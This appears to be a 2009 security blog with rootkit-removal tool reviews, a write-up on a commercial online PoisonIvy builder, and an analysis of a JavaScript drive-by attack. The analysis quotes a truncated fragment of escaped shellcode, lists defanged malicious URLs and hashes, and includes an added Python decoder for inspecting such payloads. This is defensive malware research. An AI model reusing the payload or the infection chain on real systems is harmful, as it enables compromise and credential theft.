+ Modified/access date
* Differentiate between statically & dynamically loaded DLLs. User should be able to select only dynamically loaded dlls.
* DLL Search feature to look for specified DLL in all listing
processes and list all these processes
* Remove the user specified dll from all running processes automatically.

More features are being added at the moment. Stay tuned for further updates. Contact us at contact.fingers @, if you have any questions.

- EF

Sunday, February 8, 2009

Prevx Gromozon Rootkit Removal tool

Prevx has a specialized tool for removing one specific rootkit. The Gromozon Rootkit Removal tool is focused solely on removing this particular rootkit; hence, if you are looking for a generalized anti-rootkit tool, this is not the one for you. The starting window very clearly states the same, as shown in the following image [SNAP 1].

SNAP 1 :

The tool then warns the user to disable any system security tools, such as an anti-virus, that may interfere with the removal of the Gromozon rootkit, as shown in SNAP 2.

SNAP 2 :

The tool is quite fast in performing a preliminary check for the Trojan.Gromozon rootkit component and lets the user decide whether to proceed with the removal or quit, as shown in SNAP 3.

SNAP 3 :

Once the user chooses to continue with the removal process, the next warning window asks the user to save any unsaved work before continuing with the system reboot, as seen in SNAP 4.

SNAP 4 :

After the system has been rebooted, the scan begins [SNAP 5].

SNAP 5 :

Once scanning and cleaning are complete, the scan details along with logging details are displayed to the user [SNAP 6].

SNAP 6 :

Logs are generated, as shown in the above snapshot, in a file named "gromozon_removal.log". Since no event was triggered and no hidden files were found, there was nothing really to show in a snapshot.

If you wish to participate in this project in a dedicated fashion, or in any other projects, kindly email us at contact.fingers @

- EF

Creating online polymorphic malware based on PoisonIvy

Obviously, the creators and propagators of malicious code have found a profitable way of life in this, which keeps them focused daily on creating new alternatives that let them earn "extra money" through malicious programs in which time, cost and benefit appear to be the attributes sought.

Today the Internet is also a hostile environment: even when used with the minimum necessary security precautions, it serves as a platform for committing various types of attacks and, as in this case, for offering a variety of "services", including the creation of malicious code.

This is the online version of PoisonIvy, called Polymorphic PoisonIvy Builder Online. PoisonIvy is a well-known trojan in the malware world that follows the classic model of malicious code creation: a trojan (server) is built that spreads to infect computers, and the infected computers are then controlled through the client program.

However, this online version has an extra component that makes the result much more dangerous than malware created the conventional way: it adds polymorphic features. This means that each binary built by this automated service is different, because its code is completely changed.

This feature seeks to evade signature-based antivirus detection and prolong the malware's life cycle, meaning that the less the AV detects it, the more money it generates for its creator.

This package is written in PHP/ASM, and while the malware is created online, it isn't free: it is marketed at a price of US$ 500. In the screenshot we can see its features:

This situation is merely one more of the many signs that make it clear that malware is a business, an industry that more and more developers are joining.

# Jorge Mieres

Saturday, February 7, 2009

Busy Weekend

Working on a few portals that will be released soon under EvilFingers. Will keep you guys posted on it pretty soon.

- EF

Friday, February 6, 2009

Exploitation of vulnerabilities through JS

Exploiting vulnerabilities through different file formats has become common currency, heavily used by the creators and disseminators of malware.

These methods, which are also combined with different strategies, become a time bomb that detonates with the simple action of visiting a page that has been maliciously manipulated to host the attack.

Numerous cases, such as exploiting various weaknesses through .js, .swf, .pdf and .mp3 files, or even files pretending to be .css, make it clear that any type of file is fair game to be used as a distribution channel, let alone as an infection vector.

In recent weeks, a wave of .js files has been used to redirect to malicious code downloads through obfuscated scripts hidden in the body of the JavaScript, like the following one hosted at the URL http://www.710sese .cn/a1/realdadong. js, whose md5 hash is d1094b907dfe99784b206d2ae9b1fe97:

var mybr = unescape("%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%

The point is that, among the lines of this obfuscated script, it downloads and runs a binary file from a different URL, called a1.css. This binary is malware.
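As an added example, not from the original post, here is a small Python decoder for the %uXXXX-escaped string the script above hands to unescape(), turning it into bytes for inspection plus a few first-look facts; the sample input is constructed from the first three escapes of the quoted script with NOP padding added.

```python
"""Added example (not the author's script): decode a %uXXXX-escaped string of
the kind the obfuscated JavaScript above passes to unescape(), and pull out a
few first-look facts.  Each %uXXXX escape is one UTF-16 code unit, stored low
byte first when the string is sprayed into memory, so that is the order used."""
import re

_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")

# Constructed sample: the first three escapes from the script quoted above, padded
# with NOP words so the sled measure has something to count.
SAMPLE = "%u6090%u17eb%u645e" + "%u9090" * 4

def js_unescape_to_bytes(s):
    """Mirror JavaScript unescape() and return the in-memory (UTF-16LE) bytes.
    A malformed escape raises ValueError, which is itself a useful signal that a
    captured script was cut short."""
    out, pos = bytearray(), 0
    for m in _ESCAPE.finditer(s):
        if m.start() != pos:
            raise ValueError(f"unexpected text at offset {pos}: {s[pos:m.start()]!r}")
        out += int(m.group(1) or m.group(2), 16).to_bytes(2, "little")
        pos = m.end()
    if pos != len(s):
        raise ValueError(f"malformed escape at offset {pos}: {s[pos:]!r}")
    return bytes(out)

def payload_indicators(buf, sled_byte=0x90):
    """Size, how many sled bytes (NOP 0x90 by default) the buffer holds, and whether
    a short relative jump (opcode 0xEB) sits in the first 8 bytes: decoder stubs
    commonly open with one that hops over their data, and the jump target shows
    where the code continues."""
    jmp = buf.find(b"\xeb", 0, 8)
    target = None
    if 0 <= jmp < len(buf) - 1:
        rel8 = (buf[jmp + 1] ^ 0x80) - 0x80          # sign-extend the 8-bit displacement
        target = jmp + 2 + rel8                       # relative to the next instruction
    return {"size": len(buf), "sled_bytes": buf.count(bytes([sled_byte])),
            "short_jmp_offset": jmp, "short_jmp_target": target}
```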

Furthermore, halfway through the infection process, which lasts only a few seconds, it connects to the sites txt.hsdee .com and www.wdswe .com. The former performs a Drive-by Update via the file oo.txt: when it responds with a 200 "OK", the binaries listed in that file are downloaded, the first of them from http://www.wdswe .com/new/new1. exe (md5: 1c0b699171f985b1eab092bf83f2ad37).

The information read from the text file is as follows:


This results in a number of malicious code infections, most of them designed to steal authentication credentials for online games such as WoW.

Some other URLs used to spread malware in the same way are:


Despite the effort the creators of malware put into advanced infection techniques, there is one thing that can prevent you from becoming a victim of similar attacks, and it is focused purely on keeping everything completely up to date, including applications.

# Jorge Mieres

Wednesday, February 4, 2009

F-Secure BlackLight

The Help Page gives all the details about BlackLight, along with snapshots of how it works.

Pros :
* Free
* Fast
* Easy to use.

Cons :
* Users don't get to choose any advanced options.
* Users don't get to know the stimulus-response process used in the backend for analysis. This is the case with every commercial tool.

Snapshot of Start page:

Snapshot of SCAN Start page:

Snapshot of SCAN Complete page:

Snapshot of SCAN Results page:

We are coming up with a feature-comparison graph and charts, which will be completed based on all the rootkit-analysis tools we are considering for comparison. If there are any rootkit analysis tools you would like us to consider for this comparison project, kindly contact us.

Note: The comparison will use a comprehensive list of vectors. The pros & cons list here is NOT a real vector for comparison, and hence will not be considered in the comparison project.

- EF